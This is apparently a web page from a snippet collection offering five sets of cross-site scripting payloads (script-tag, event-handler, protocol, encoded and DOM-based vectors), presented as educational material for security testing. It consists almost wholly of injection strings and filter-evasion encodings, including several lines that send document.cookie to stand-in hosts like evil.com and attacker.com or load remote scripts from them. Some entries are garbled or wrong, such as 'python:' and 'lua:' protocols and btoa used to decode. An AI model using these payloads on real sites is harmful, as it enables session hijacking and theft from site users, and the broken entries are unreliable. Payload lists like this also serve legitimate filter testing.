XSS跨站脚本载荷示例
跨站脚本(XSS)载荷的教育集合,用于安全测试和验证
📝 Script标签XSS注入 javascript
🟢 simple
⭐⭐
基于script标签的各种跨站脚本载荷 - 基本脚本、外部源、大小写变体和混淆技术
⏱️ 15 min
🏷️ xss, script, injection, security, web
# Script Tag XSS Injection Vectors
# Various script tag based cross-site scripting payloads
# Basic script tag injections
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>window.location='http://evil.com'</script>
<script>document.location='http://attacker.com'</script>
# Script tag with external source
<script src="http://evil.com/evil.js"></script>
<script src="//attacker.com/malicious.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/evil/1.0/payload.js"></script>
# Case variations to bypass filters
<ScRiPt>alert('XSS')</sCrIpT>
<SCRIPT>alert(1)</SCRIPT>
<Script>alert(String.fromCharCode(88,83,83))</script>
# Script tag with event handlers
<script/onload="alert(1)"></script>
<script/onerror=alert(1)></script>
<script onload="alert('XSS')">
<script onreadystatechange="alert(1)">
# Script tag with obfuscation
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert('\\x58\\x53\\x53')</script>
<script>alert('\\u0058\\u0053\\u0053')</script>
<script>eval('\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29')</script>
# Script tag with HTML encoding
<script>alert("XSS")</script>
<script>alert('XSS')</script>
# Script tag with Unicode characters
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\x61\x6C\x65\x72\x74(1)</script>
# Script tag with mixed content
<script type="text/javascript">alert(1)</script>
<script language="javascript">alert(1)</script>
<script type="text/vbscript">msgbox("XSS")</script>
# Script tag with img src onerror (image-based XSS)
<img src=x onerror="alert('XSS')">
<img src=x onerror=alert(1)>
<img src="x" onerror="javascript:alert(1)">
# Script tag with double encoding
<<script>alert('XSS');//<</script>
<script><script>alert(1)</script>
</script>
# Script tag with comment bypass
<script>/**/alert(1)/**/</script>
<script>//%0Aalert(1)</script>
<script>//%0D%0Aalert(1)</script>
# Script tag with whitespace variations
<script>alert(1) </script>
<script>\talert(1)\n</script>
<script>\r\nalert(1)\r\n</script>
# Script tag with style and comments
<script>/*comment*/alert(1)/*comment*/</script>
<script><!--alert(1)--></script>
<script><![CDATA[alert(1)]]></script>
# Script tag with source manipulation
<script src="data:text/javascript,alert(1)"></script>
<script src="javascript:alert(1)"></script>
# Script tag with base tag bypass
<base href="http://evil.com/">
<script src="payload.js"></script>
# Script tag with meta tag
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="set-cookie" content="XSS=<script>alert(1)</script>">
# Script tag with SVG
<script>document.createElement('img').src='http://evil.com/'+document.cookie</script>
# Script tag with iframe
<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
# Script tag with object
<object data="javascript:alert(1)"></object>
<object data="data:text/html,<script>alert(1)</script>"></object>
# Script tag with embed
<embed src="javascript:alert(1)"></embed>
<embed src="data:text/html,<script>alert(1)</script>"></embed>
# Script tag with link
<link rel="stylesheet" href="javascript:alert(1)">
<link rel="icon" href="javascript:alert(1)">
# Script tag with form
<form><button formaction="javascript:alert(1)">XSS</button></form>
<form><input formaction="javascript:alert(1)" type="submit"></form>
# Script tag with details and summary
<details open ontoggle="alert(1)"><summary>XSS</summary></details>
# Script tag with marquee
<marquee onstart="alert(1)">XSS</marquee>
# Script tag with audio and video
<audio src=x onerror="alert(1)"></audio>
<video src=x onerror="alert(1)"></video>
<video><source onerror="alert(1)"></source></video>
# Script tag with input and button
<input autofocus onfocus=alert(1)>
<button onfocus="alert(1)" autofocus>
<select onfocus=alert(1) autofocus><option>
# Script tag with textarea
<textarea autofocus onfocus="alert(1)"></textarea>
<textarea onfocus="alert(1)" autofocus>
# Script tag with keygen
<keygen autofocus onfocus="alert(1)">
# Script tag with progress
<progress onmouseover="alert(1)"></progress>
# Script tag with meter
<meter onmouseover="alert(1)" value="1" min="0" max="100">XSS</meter>
# Script tag with frame (deprecated but still works)
<frame src="javascript:alert(1)"></frame>
# Script tag with applet
<applet code="javascript:alert(1)"></applet>
# Script tag with param
<param name="src" value="javascript:alert(1)">
# Script tag with isindex
<isindex action="javascript:alert(1)" type="submit">
# Script tag with body
<body onload="alert(1)"></body>
<body onunload="alert(1)"></body>
# Script tag with frame and frameset
<frameset><frame src="javascript:alert(1)"></frame></frameset>
# Script tag with bgsound
<bgsound src="javascript:alert(1)">
# Script tag with style
<style>@import "javascript:alert(1)";</style>
<style>body{background:url("javascript:alert(1)")}</style>
# Script tag with table
<table background="javascript:alert(1)"></table>
<td background="javascript:alert(1)">
# Script tag with div and span
<div style="background:url(javascript:alert(1))">XSS</div>
<span style="background:url(javascript:alert(1))">XSS</span>📝 事件处理器XSS注入 javascript
🟡 intermediate
⭐⭐⭐
基于事件处理器的XSS载荷 - onerror、onload、onclick、onmouseover、onfocus和其他DOM事件
⏱️ 20 min
🏷️ xss, event handlers, dom, security, javascript
# Event Handler XSS Injection Vectors
# Event handler based cross-site scripting payloads
# Image onerror event
<img src=x onerror="alert('XSS')">
<img src="x" onerror=alert(1)>
<img src=x onerror="javascript:alert(1)">
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<img src=x onerror="document.location='http://evil.com'">
# Body onload event
<body onload=alert('XSS')></body>
<body onload="alert(1)">
<body onload="javascript:alert('XSS')">
<body onunload="alert(1)"></body>
# Anchor onclick event
<a href="#" onclick="alert('XSS')">Click me</a>
<a href="javascript:void(0)" onclick="alert(1)">Click</a>
<a onclick="alert(1)">XSS</a>
<a href=# onclick="alert(1)">Click</a>
# Div mouse events
<div onmouseover="alert('XSS')">Hover me</div>
<div onmouseout="alert(1)">Mouse out</div>
<div onmouseenter="alert('XSS')">Enter</div>
<div onmouseleave="alert('XSS')">Leave</div>
<div onmousemove="alert(1)">Move mouse</div>
<div onmousedown="alert('XSS')">Down</div>
<div onmouseup="alert('XSS')">Up</div>
# Input focus events
<input onfocus=alert(1) autofocus>
<input type="text" onfocus="alert('XSS')" autofocus>
<input type="password" onfocus="alert(1)" autofocus>
<input type="search" onfocus="alert('XSS')" autofocus>
# SVG events
<svg onload=alert(1)>
<svg onload="alert('XSS')">
<svg onmouseover="alert(1)">
<svg onmouseenter="alert('XSS')">
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
# Iframe events
<iframe onload=alert('XSS')></iframe>
<iframe onload="alert(1)"></iframe>
<iframe src="javascript:alert(1)"></iframe>
<iframe src="#" onload="alert(1)"></iframe>
# Details and summary toggle
<details open ontoggle=alert('XSS')>Details</details>
<details open ontoggle="alert(1)">
<details ontoggle="alert('XSS')">Click to open</details>
# Form events
<form onsubmit="alert('XSS')">
<input type="submit" formaction="javascript:alert(1)">
<button formaction="javascript:alert(1)">Submit</button>
<form onreset="alert(1)">
<button onfocus="alert(1)" autofocus>
# Key events
<input onkeydown="alert('XSS')">
<input onkeypress="alert(1)">
<input onkeyup="alert('XSS')">
<textarea onkeydown="alert(1)"></textarea>
<textarea onkeypress="alert('XSS')"></textarea>
# Mouse events on various elements
<b onmouseover="alert('XSS')">Bold</b>
<i onclick="alert(1)">Italic</i>
<u ondblclick="alert('XSS')">Underline</u>
<p oncontextmenu="alert(1)">Paragraph</p>
<h1 onclick="alert('XSS')">Heading</h1>
# Window events
<window onload="alert(1)">
<html onload="alert('XSS')">
<main onload="alert('XSS')">
# Table events
<table onmouseover="alert('XSS')"><tr><td>Cell</td></tr></table>
<tr onclick="alert(1)"><td>Click</td></tr>
<td ondblclick="alert('XSS')">Double click</td>
<th onmouseenter="alert('XSS')">Header</th>
# List events
<ul onclick="alert('XSS')"><li>Item</li></ul>
<ol onmouseover="alert(1)"><li>Item</li></ol>
<li onclick="alert('XSS')">List item</li>
# Selection and change events
<input onchange="alert('XSS')">
<select onchange="alert(1)"><option>1</option></select>
<textarea onselect="alert('XSS')">Select text</textarea>
# Scroll events
<div onscroll="alert('XSS')" style="height:100px;overflow:scroll">Scroll me<br><br><br><br><br><br><br><br><br></div>
<body onscroll="alert(1)">
# Drag and drop events
<div draggable="true" ondragstart="alert('XSS')">Drag me</div>
<div ondragover="alert(1)">Drop zone</div>
<div ondrop="alert('XSS')">Drop here</div>
# Clipboard events
<input oncopy="alert('XSS')">
<input oncut="alert(1)">
<input onpaste="alert('XSS')">
# Media events
<audio onloadeddata="alert('XSS')"><source src="x"></audio>
<video onplay="alert(1)"><source src="x"></video>
<video onended="alert('XSS')"></video>
# Animation events
<div style="animation:x 5s" onanimationstart="alert('XSS')">Animated</div>
<div onanimationend="alert(1)">Animation end</div>
# Transition events
<div style="transition:all 2s" ontransitionend="alert('XSS')">Transition</div>
# Touch events
<div ontouchstart="alert('XSS')">Touch start</div>
<div ontouchend="alert(1)">Touch end</div>
<div ontouchmove="alert('XSS')">Touch move</div>
# Focus and blur events
<input onblur="alert('XSS')" autofocus>
<select onfocus="alert(1)" autofocus>
<textarea onblur="alert('XSS')"></textarea>
# Error events on various elements
<img src=x onerror="alert('XSS')">
<link rel="stylesheet" href="x" onerror="alert(1)">
<script src="x" onerror="alert('XSS')"></script>
# Ready state changes
<script onreadystatechange="alert('XSS')"></script>
# Data events
<object ondataavailable="alert('XSS')"></object>
# Input events
<input oninput="alert('XSS')">
<textarea oninput="alert(1)"></textarea>
# Invalid events
<input oninvalid="alert('XSS')" required>
<form oninvalid="alert(1)">
# Search events
<input type="search" onsearch="alert('XSS')">
# Time events
<input type="time" ontimeupdate="alert('XSS')">
# Progress events
<progress onprogress="alert('XSS')"></progress>
# Abort events
<img src=x onabort="alert('XSS')">
# Can play events
<video oncanplay="alert('XSS')"></video>
# Duration change events
<audio ondurationchange="alert(1)"></audio>
# Emptied events
<video onemptied="alert('XSS')"></video>
# Stalled events
<audio onstalled="alert('XSS')"></audio>
# Suspend events
<video onsuspend="alert('XSS')"></video>
# Volume change events
<audio onvolumechange="alert(1)"></audio>
# Waiting events
<video onwaiting="alert('XSS')"></video>
# Loaded events
<img onload="alert('XSS')">
<script onload="alert(1)"></script>
# Mouse wheel events
<div onwheel="alert('XSS')">Scroll wheel</div>
# Pointer events
<div onpointerdown="alert('XSS')">Pointer down</div>
<div onpointerup="alert(1)">Pointer up</div>
<div onpointerenter="alert('XSS')">Pointer enter</div>
<div onpointerleave="alert('XSS')">Pointer leave</div>
<div onpointermove="alert('XSS')">Pointer move</div>
<div onpointerover="alert('XSS')">Pointer over</div>
<div onpointerout="alert('XSS')">Pointer out</div>
# Fullscreen events
<div onfullscreenchange="alert('XSS')">Fullscreen change</div>
<div onfullscreenerror="alert(1)">Fullscreen error</div>📝 协议XSS注入 javascript
🟡 intermediate
⭐⭐⭐
基于JavaScript协议的XSS - javascript:、data:、vbscript:和其他协议注入
⏱️ 25 min
🏷️ xss, protocol, javascript, data, security
# JavaScript Protocol XSS Injection Vectors
# Protocol-based cross-site scripting payloads
# Basic javascript protocol
javascript:alert('XSS')
javascript:alert(1)
javascript:alert(document.cookie)
javascript:window.location='http://evil.com'
javascript:document.location='http://attacker.com'
# JavaScript protocol in anchor tags
<a href="javascript:alert(1)">Click</a>
<a href="javascript:alert('XSS')">XSS</a>
<a href="javascript:window.location='http://evil.com'">Evil</a>
<a href="javascript:document.cookie">Cookie</a>
# JavaScript protocol in image tags
<img src="javascript:alert(1)">
<img src="javascript:alert('XSS')">
<img src="javascript:document.location='http://evil.com'">
# JavaScript protocol in iframe
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:alert('XSS')"></iframe>
<iframe src="javascript:document.location='http://evil.com'"></iframe>
# JavaScript protocol in form action
<form action="javascript:alert(1)">
<button formaction="javascript:alert('XSS')">Submit</button>
<form action="javascript:document.location='http://evil.com'">
# JavaScript protocol in input
<input type="image" src="javascript:alert(1)">
<input type="image" formaction="javascript:alert('XSS')">
# JavaScript protocol in button
<button formaction="javascript:alert(1)">XSS</button>
<button formaction="javascript:alert('XSS')">Click</button>
# JavaScript protocol with obfuscation
javascript:\u0061\u006C\u0065\u0072\u0074(1)
javascript:\x61\x6C\x65\x72\x74(1)
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))
# JavaScript protocol with encoding
javascript:&alert(1);
javascript:%61%6C%65%72%74(1)
javascript:\u0061\u006C\u0065\u0072\u0074(1)
javascript:alert%28%27XSS%27%29
# JavaScript protocol with whitespace
javascript: alert(1)
javascript:\talert('XSS')
javascript:\nalert(1)
javascript:\r\nalert('XSS')
# JavaScript protocol with comments
javascript://%0Aalert(1)
javascript://%0D%0Aalert('XSS')
javascript:/*comment*/alert(1)/*comment*/
# JavaScript protocol with multiple statements
javascript:alert(1);alert(2);alert(3)
javascript:a=1;b=2;alert(a+b)
javascript:if(1){alert('XSS')}else{alert(2)}
# JavaScript protocol with DOM manipulation
javascript:document.body.innerHTML='<h1>XSS</h1>'
javascript:document.write('<script>alert(1)</script>')
javascript:document.createElement('img').src='http://evil.com/'+document.cookie
# JavaScript protocol with location manipulation
javascript:window.location='http://evil.com'
javascript:location.href='http://attacker.com'
javascript:document.location='javascript:alert(1)'
# JavaScript protocol with cookie theft
javascript:window.location='http://evil.com/'+document.cookie
javascript:location='http://attacker.com/?c='+document.cookie
javascript:new Image().src='http://evil.com/?'+document.cookie
# JavaScript protocol with form submission
javascript:document.forms[0].action='http://evil.com'
javascript:document.forms[0].submit()
# JavaScript protocol with XMLHttpRequest
javascript:x=new XMLHttpRequest();x.open('GET','http://evil.com/?'+document.cookie);x.send()
# JavaScript protocol with fetch
javascript:fetch('http://evil.com/?'+document.cookie)
# JavaScript protocol in object tag
<object data="javascript:alert(1)"></object>
<object data="javascript:alert('XSS')"></object>
# JavaScript protocol in embed tag
<embed src="javascript:alert(1)"></embed>
<embed src="javascript:alert('XSS')"></embed>
# JavaScript protocol in link tag
<link rel="stylesheet" href="javascript:alert(1)">
<link rel="icon" href="javascript:alert('XSS')">
# JavaScript protocol in area tag
<area href="javascript:alert(1)">Map</area>
<area href="javascript:alert('XSS')">Click</area>
# JavaScript protocol in base tag
<base href="javascript:alert(1)">
# JavaScript protocol in meta refresh
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
# VBScript protocol (IE only)
vbscript:msgbox("XSS")
vbscript:alert(1)
vbscript:document.location='http://evil.com'
# Data protocol with script
data:text/html,<script>alert(1)</script>
data:text/html,<script>alert('XSS')</script>
data:text/html,<h1 onclick=alert(1)>Click</h1>
# Data protocol with HTML encoding
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
data:text/html,%3Cscript%3Ealert('XSS')%3C/script%3E
# Data protocol in iframe
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>
# Data protocol in object
<object data="data:text/html,<script>alert(1)</script>"></object>
<object data="data:text/html,<script>alert('XSS')</script>"></object>
# Data protocol in embed
<embed src="data:text/html,<script>alert(1)</script>"></embed>
# Data protocol with base64
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
# About protocol
about:blank
about:<script>alert(1)</script>
# Chrome protocol
chrome://chrome/content/browser.xul?<script>alert(1)</script>
# Safari protocol
safari://javascript:alert(1)
# Opera protocol
opera://javascript:alert('XSS')
# File protocol
file:///javascript:alert(1)
# View-source protocol
view-source:javascript:alert(1)
# Python protocol (rare)
python:alert(1)
# Lua protocol (rare)
lua:alert('XSS')
# LiveScript protocol (rare)
livescript:alert(1)
# JavaScript protocol in SVG
<svg><a xlink:href="javascript:alert(1)"><text>Click</text></a></svg>
# JavaScript protocol in mathml
<math><a xlink:href="javascript:alert('XSS')"><text>Click</text></a></math>
# JavaScript protocol with event handler
javascript:void(document.onload=function(){alert(1)})
# JavaScript protocol with eval
javascript:eval('alert(1)')
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))
# JavaScript protocol with setTimeout
javascript:setTimeout('alert(1)',0)
javascript:setTimeout('alert("XSS")',1000)
# JavaScript protocol with setInterval
javascript:setInterval('alert(1)',1000)
javascript:setInterval('alert("XSS")',2000)
# JavaScript protocol with Function constructor
javascript:new Function('alert(1)')()
javascript:(new Function('alert("XSS")'))()
# JavaScript protocol with atob
javascript:eval(atob('YWxlcnQoMSk='))
# JavaScript protocol with btoa
javascript:eval(btoa('YWxlcnQoMSk='))
# JavaScript protocol in style tag (expression IE)
<style>body{background:url("javascript:alert(1)")}</style>
<style>body{background:expression(alert('XSS'))}</style>
# JavaScript protocol in table background
<table background="javascript:alert(1)"></table>
<td background="javascript:alert('XSS')">Cell</td>
# JavaScript protocol with XML namespace
<html xmlns:xul><xul:script src="javascript:alert(1)"/></html>
# JavaScript protocol with XSLT
<?xml-stylesheet type="text/xsl" href="javascript:alert(1)"?>📝 编码XSS载荷 javascript
🔴 complex
⭐⭐⭐⭐
使用各种编码技术的XSS载荷 - URL编码、HTML实体、Unicode、Base64和混合编码
⏱️ 30 min
🏷️ xss, encoding, obfuscation, security, evasion
# Encoded XSS Injection Vectors
# Various encoding techniques to bypass XSS filters
# URL encoding
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
%3Cimg%20src=x%20onerror=alert('XSS')%3E
%3Ciframe%20src%3Djavascript:alert(1)%3E%3C/iframe%3E
# Double URL encoding
%253Cscript%253Ealert(1)%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%253Cscript%253Ealert('XSS')%253C/script%253E
# HTML entity encoding
<script>alert('XSS')</script>
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<iframe src=javascript:alert(1)></iframe>
<div onmouseover=alert('XSS')>Hover</div>
# Decimal HTML entity encoding
<script>alert(1)</script>
<img src=x onerror=alert('XSS')>
<div onmouseover="alert(1)">Hover</div>
# Hexadecimal HTML entity encoding
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<iframe src=javascript:alert(1)></iframe>
# Mixed HTML entity encoding
<script>alert(1)</script>
<img>src=x onerror=alert('XSS')</img>
# Unicode escape sequences
\u003Cscript\u003Ealert(1)\u003C/script\u003E
\u003Cimg src=x onerror=alert('XSS')\u003E
\u003Cdiv onmouseover=\u0022alert(1)\u0022\u003EHover\u003C/div\u003E
# Hexadecimal escape sequences
\x3Cscript\x3Ealert('XSS')\x3C/script\x3E
\x3Cimg src=x onerror=alert(1)\x3E
\x3Ciframe src=javascript:alert(1)\x3E\x3C/iframe\x3E
# Octal escape sequences
\074script\076alert(1)\074/script\076
\074img src=x onerror=alert('XSS')\074
# Base64 encoding
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgxKT48L2lmcmFtZT4=
# Mixed encoding combinations
%26%23x3C%3Bscript%26%23x3E%3Balert(1)%26%23x3C%3B/script%26%23x3E%3B
%26lt%3Bscript%26gt%3Balert('XSS')%26lt%3B/script%26gt%3B
\u003Cimg src=x onerror=\u0022alert(1)\u0022\u003E
# UTF-7 encoding (deprecated but works in some cases)
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
+ADw-img src=x onerror=alert('XSS')+AD4-
# UTF-16 encoding
%\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(1)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
# CSS expression encoding (IE)
expression(alle rt(1))
expression(alert('XSS'))
expre/*comment*/ssion(onerror=alert(1))
# JavaScript String encoding
alert(String.fromCharCode(88,83,83))
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
# JavaScript hex encoding
alert(\x58\x53\x53)
eval(\x61\x6C\x65\x72\x74\x28\x31\x29)
document.write(\x3Cscript\x3Ealert(1)\x3C/script\x3E)
# JavaScript octal encoding
alert(\130\123\123)
eval(\141\154\145\162\164\50\61\51)
# JavaScript unicode encoding
alert(\u0058\u0053\u0053)
eval(\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029)
# Mixed character encoding
\u003cimg src=x onerror=\x22alert(1)\x22\u003e
<script>alert(String.fromCharCode(88,83,83))</script>
%3Cscript%3Eeval(\x61\x6C\x65\x72\x74\x28\x31\x29)%3C/script%3E
# Overlong encoding
%e0%80%bcscript%e0%80%bealert(1)%e0%80%bc/script%e0%80%be
%c0%bcscript%c0%bealert('XSS')%c0%bc/script%c0%be
# Percent encoding with null bytes
%00%3Cscript%3Ealert(1)%3C/script%3E
%00%3Cimg%20src=x%20onerror=alert('XSS')%3E
# Slash escaping
\/script\/
\/\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0078\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\/
# Backtick escaping
`<script>alert(1)</script>`
`<img src=x onerror=alert('XSS')>`
# Quote variations
<script>alert("XSS")</script>
<script>alert('XSS')</script>
<script>alert(`XSS`)</script>
<img src=x onerror="alert(1)">
<img src=x onerror='alert(1)'>
<img src=x onerror=`alert(1)`>
# EOL encoding (end of line)
<script>alert(1)
</script>
<script>alert('XSS') </script>
# Tab and newline in tags
<img src=x onerror=alert(1)>
<img
src
=
x
onerror
=
alert('XSS')
>
# Zero-width characters
<script>\u200Balert(1)</script>
<img src=x onerror=\u200Balert('XSS')>
<div onmouseover=\u200Calert(1)>Hover</div>
# Right-to-left override
<script>\u202Ealert(1)</script>
<div onmouseover=\u202Ealert('XSS')>Hover</div>
# Non-breaking space
<img\u00A0src=x\u00A0onerror=alert(1)>
<script\u00A0type="text/javascript">\u00A0alert('XSS')</script>
# Soft hyphen
<img\u00ADsrc=x\u00ADonerror=alert(1)>
<script\u00AD>alert(1)</script>
# Encoding in protocol
javascript:\u0061\u006C\u0065\u0072\u0074(1)
javascript:%61%6C%65%72%74('XSS')
javascript:\x61\x6C\x65\x72\x74(1)
# CSS encoding
<div style="background:url(javascript:alert(1))">XSS</div>
<div style="background:url(javascript:alert(1))">Hover</div>
<div style="background:expression(alert('XSS'))">Test</div>
# Data URL encoding
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4+
data:text/plain,%3Cscript%3Ealert('XSS')%3C/script%3E
# SVG encoding
<svg><script>alert(1)</script></svg>
<svg><script>&alert('XSS')</script></svg>
<svg onload=alert(1)>
<svg onerror=alert('XSS')>
# MathML encoding
<math><script>alert(1)</script></math>
<math><maction actiontype="statusline#http://evil.com" xlink:href="javascript:alert('XSS')">Click</maction></math>
# XSLT encoding
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="javascript:alert(1)"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>alert('XSS')</script>
</xsl:template>
</xsl:stylesheet>📝 基于DOM的XSS载荷 javascript
🔴 complex
⭐⭐⭐⭐⭐
操纵DOM的基于DOM的XSS向量 - innerHTML、outerHTML、eval、setTimeout、createElement和位置操作
⏱️ 35 min
🏷️ xss, dom, client-side, security, javascript
# DOM-based XSS Injection Vectors
# DOM-based cross-site scripting payloads that manipulate the DOM
# Image onerror with document.write
<img src=x onerror="document.write('<script>alert(1)</script>')">
<img src=x onerror="document.write('<img src=x onerror=alert(\'XSS\')>')">
# Div with eval
<div onclick="eval('alert(1)')">Click</div>
<div onmouseover="eval('alert(\'XSS\')')">Hover</div>
<div onclick="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">Click</div>
# Anchor with location manipulation
<a href="#" onclick="location='javascript:alert(1)'">XSS</a>
<a href="#" onclick="window.location='javascript:alert(\'XSS\')'">Click</a>
<a href="javascript:void(0)" onclick="location.href='javascript:alert(1)'">Evil</a>
# Form with action manipulation
<form action="javascript:alert(1)">
<input type="submit" onclick="this.form.action='javascript:alert(\'XSS\')'">
<button onclick="this.form.action='javascript:alert(1)'">Submit</button>
# Input with innerHTML
<input onfocus="this.innerHTML='<img src=x onerror=alert(1)>'" autofocus>
<input onfocus="this.outerHTML='<script>alert(\'XSS\')</script>'" autofocus>
# Textarea with innerHTML
<textarea onfocus="this.innerHTML='<img src=x onerror=alert(1)>'" autofocus></textarea>
<textarea onfocus="this.outerHTML='<script>alert(\'XSS\')</script>'" autofocus></textarea>
# Div with createElement
<div onclick="var img=document.createElement(\'img\');img.src=\'x\';img.onerror=alert(1);document.body.appendChild(img)">Click</div>
<div onmouseover="var script=document.createElement(\'script\');script.src=\'http://evil.com/evil.js\';document.body.appendChild(script)">Hover</div>
# Script with setTimeout
<script>setTimeout("alert('XSS')", 100)</script>
<script>setTimeout("alert(1)", 1000)</script>
<script>setTimeout('document.write(\'<script>alert(1)</script>\')', 500)</script>
# Script with setInterval
<script>setInterval("alert('XSS')", 5000)</script>
<script>setInterval('alert(1)', 10000)</script>
# Script with Function constructor
<script>new Function("alert('XSS')")()</script>
<script>(new Function('alert(1)'))()</script>
<script>Function('alert(\'XSS\')')()</script>
# Location hash based XSS
<a href="#<script>alert(1)</script>">Click</a>
<a href="#<img src=x onerror=alert('XSS')>">Hash</a>
<script>eval(location.hash.substring(1))</script>
# Location search based XSS
<a href="?<script>alert(1)</script>">Click</a>
<a href="?<img src=x onerror=alert('XSS')>">Query</a>
<script>eval(location.search.substring(1))</script>
# Document.referrer based XSS
<script>eval(document.referrer)</script>
<img src=x onerror="eval(document.referrer)">
# Document.URL based XSS
<script>eval(document.URL)</script>
<div onmouseover="eval(document.URL)">Hover</div>
# Document.baseURI based XSS
<script>eval(document.baseURI)</script>
<img src=x onerror="eval(document.baseURI)">
# Window.name based XSS
<iframe src="#" name="<script>alert(1)</script>"></iframe>
<script>eval(window.name)</script>
# PostMessage based XSS
<script>window.onmessage=function(e){eval(e.data)}</script>
<iframe src="javascript:parent.postMessage('<script>alert(1)</script>','*')"></iframe>
# LocalStorage based XSS
<script>eval(localStorage.getItem('xss'))</script>
<script>eval(sessionStorage.getItem('payload'))</script>
# Cookie based XSS
<script>eval(document.cookie)</script>
<img src=x onerror="eval(document.cookie)">
# DOMParser based XSS
<script>var parser=new DOMParser();var doc=parser.parseFromString('<script>alert(1)</script>','text/html');</script>
<script>var xml='<script>alert(\'XSS\')</script>';var parser=new DOMParser();var doc=parser.parseFromString(xml,'text/html');</script>
# Template literal based XSS
<script>`${alert(1)}`</script>
<div onclick="`${alert(\'XSS\')}`">Click</div>
<img src=x onerror="`${alert(1)}`">
# Assign operations
<script>location.assign('javascript:alert(1)')</script>
<script>location.replace('javascript:alert(\'XSS\')')</script>
# History manipulation
<script>history.pushState(null,null,'javascript:alert(1)')</script>
<script>history.replaceState(null,null,'javascript:alert(\'XSS\')')</script>
# Open with DOM payload
<script>window.open('javascript:alert(1)')</script>
<script>window.open(\'javascript:alert(\'XSS\')\')</script>
# Document domain manipulation
<script>document.domain='evil.com'</script>
<script>document.domain='attacker.com';alert(1)</script>
# Parent frame access
<script>parent.document.body.innerHTML='<script>alert(1)</script>'</script>
<script>top.document.write('<img src=x onerror=alert(\'XSS\')>')</script>
# OPENER access (from popup)
<script>opener.document.write('<script>alert(1)</script>')</script>
<script>window.opener.location='javascript:alert(\'XSS\')'</script>
# Frameset access
<script>frames[0].document.write('<script>alert(1)</script>')</script>
<script>parent.frames[0].location='javascript:alert(\'XSS\')'</script>
# Content window access
<iframe src="#" id="xss"></iframe>
<script>document.getElementById('xss').contentWindow.location='javascript:alert(1)'</script>
# Srcdoc manipulation
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe srcdoc="<img src=x onerror=alert('XSS')">"></iframe>
# Data attribute access
<div data-xss="<script>alert(1)</script>"></div>
<script>eval(document.querySelector('[data-xss]').dataset.xss)</script>
# Custom attribute access
<div xss="<img src=x onerror=alert('XSS')">"></div>
<script>eval(document.querySelector('[xss]').getAttribute('xss'))</script>
# getElementsByTagName manipulation
<script>document.getElementsByTagName('body')[0].innerHTML='<script>alert(1)</script>'</script>
<script>document.getElementsByTagName('div')[0].outerHTML='<img src=x onerror=alert(\'XSS\')>'</script>
# getElementsByClassName manipulation
<script>document.getElementsByClassName('test')[0].innerHTML='<script>alert(1)</script>'</script>
# QuerySelector manipulation
<script>document.querySelector('.test').innerHTML='<img src=x onerror=alert(\'XSS\')>'</script>
<script>document.querySelectorAll('div')[0].outerHTML='<script>alert(1)</script>'</script>
# outerHTML replacement
<div onmouseover="this.outerHTML='<img src=x onerror=alert(1)>'">Hover</div>
<button onclick="this.outerHTML='<script>alert(\'XSS\')</script>'">Click</button>
# insertAdjacentHTML
<div onmouseover="this.insertAdjacentHTML('afterbegin','<img src=x onerror=alert(1)>')">Hover</div>
<script>document.body.insertAdjacentHTML('beforeend','<script>alert(\'XSS\')</script>')</script>
# createRange and createContextualFragment
<script>var range=document.createRange();range.selectNode(document.body);var fragment=range.createContextualFragment('<script>alert(1)</script>');document.body.appendChild(fragment)</script>
# importNode
<script>var doc=new DOMParser().parseFromString('<script>alert(1)</script>','text/html');var node=doc.importNode(doc.documentElement,true);document.body.appendChild(node)</script>
# adoptNode
<script>var doc=new DOMParser().parseFromString('<img src=x onerror=alert(\'XSS\')>','text/html');var node=document.adoptNode(doc.documentElement);document.body.appendChild(node)</script>
# cloneNode with innerHTML manipulation
